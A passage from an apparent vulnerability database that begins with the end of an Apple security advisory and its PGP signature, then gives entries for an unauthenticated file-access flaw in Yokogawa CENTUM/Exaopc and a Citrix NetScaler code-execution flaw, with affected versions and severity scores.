attempts. This issue was addressed by disabling SSL 3.0 support in
Web Server, Calendar & Contacts Server, and Remote Administration.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
ServerRuby
Available for: OS X Yosemite v10.10 or later
Impact: Running a Ruby script that handles untrusted YAML tags may
lead to an unexpected application termination or arbitrary code
execution
Description: An integer overflow issue existed in LibYAML's handling
of YAML tags. This issue was addressed through additional validation
of YAML tags.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUQCLKAAoJEBcWfLTuOo7tqr0P/1fGVeD8xAAgMRpH/hYYkKpj
CGKAUBfTXM9clAhUHP1Es+T1qG67JX9CNrrl5yKMQCupojgNIkO1D0Pj5QlLZzkL
HR6AgI8eYeykiw8VRFI8DC7f3q/A1aRrijj8bPQ6BoPUq28Vya/GjEAMxV1l21l1
qLyNiDH8X8DC/CWyxOXVMD4yqIpzCOPEIAvgV1aB0z1UEdw7fLLBCEIAkNR3tL9M
5OlRT8X4dzpx3YpTvlB9s7zIAPtLgTjcVpPbkT2yJ9OZsewml2aFM7NWDYpYhIRg
z7bOMmKZep15a+XeXH7cdqXMfHW/XGdkYF/4Z85wHG44Kebaikq+K0XoTxjHlqXi
9rtNdcwh+p4DxTQNO0fK7WbfAo7FiF6aonY9D9hp47jbhB9KODVeOpqo6B7sOudq
tBAAS1pBbrsULUWRCZRaN3LlPigtInqIIPuLGVQx4ApUo1guxXb0A88ZU3yiR+Bl
RJHAEoevKjqhLiZDt1V8sSk6sPAh7p02deP5RDIwNJfapP+RrXoJ6knexRD44kNb
MwVD6a2EcOoRFgwcjvgFZ1etpoHT/VAs7Ql/GjWN5snDLsZ/vlGtSPn1i3kjkxBZ
oYDmJfC91RoC6exW7img3H9csN0sgtVGJRLrf6cdg41EjVjQaUUVQfBn/DVVyMb8
fIWnhQEvESJVqfrk3Q3X
=LbVb
-----END PGP SIGNATURE-----
| VAR-201412-0282 | CVE-2014-5208 | CENTUM and Exaopc Vulnerabilities that allow access to arbitrary files |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
BKBCopyD.exe in the Batch Management Packages in Yokogawa CENTUM CS 3000 through R3.09.50 and CENTUM VP through R4.03.00 and R5.x through R5.04.00, and Exaopc through R3.72.10, does not require authentication, which allows remote attackers to read arbitrary files via a RETR operation, write to arbitrary files via a STOR operation, or obtain sensitive database-location information via a PMODE operation, a different vulnerability than CVE-2014-0784. Provided by Yokogawa Electric Corporation CENTUM and Exaopc Is BKBCopyD.exe There is a problem in the processing of the file, and there is a vulnerability that can access arbitrary files. In addition, National Vulnerability Database (NVD) Then CWE-284 It is published as Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlCrafted communication frame 20111/tcp By sending to, arbitrary files may be obtained or created with the user's authority. Yokogawa CENTUM CS3000 is a production control system.
If Yokogawa CENTUM's multiple products have Batch Management installed, they will start the BKBCopyD.exe service and listen on the 20111 / TCP port. There is no verification mechanism, allowing attackers to use the vulnerability to perform malicious operations, such as reading and writing files. Multiple Yokogawa products are prone to a security weakness.
An attacker may leverage this issue to obtain potentially sensitive information and perform unauthorized actions in the context of the affected application. Yokogawa CENTUM CS, etc. are all products of Japan's Yokogawa Electric (Yokogawa) company. Exaopc is an OPC data access server. The vulnerability is caused by the program not requiring authentication. The following products and versions are affected: Yokogawa CENTUM CS 3000 R3.09.50 and earlier, CENTUM VP R4.03.00 and earlier, R5.x R5.04.00 and earlier, Exaopc R3.72.10 and earlier
| VAR-201410-0363 | CVE-2014-7140 | Citrix NetScaler Application Delivery Controller and NetScaler Gateway Arbitrary code execution vulnerability in the management interface |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the management interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.x before 10.1-129.11 and 10.5 before 10.5-50.10 allows remote attackers to execute arbitrary code via unknown vectors. Successful exploits will compromise the application and possibly the underlying device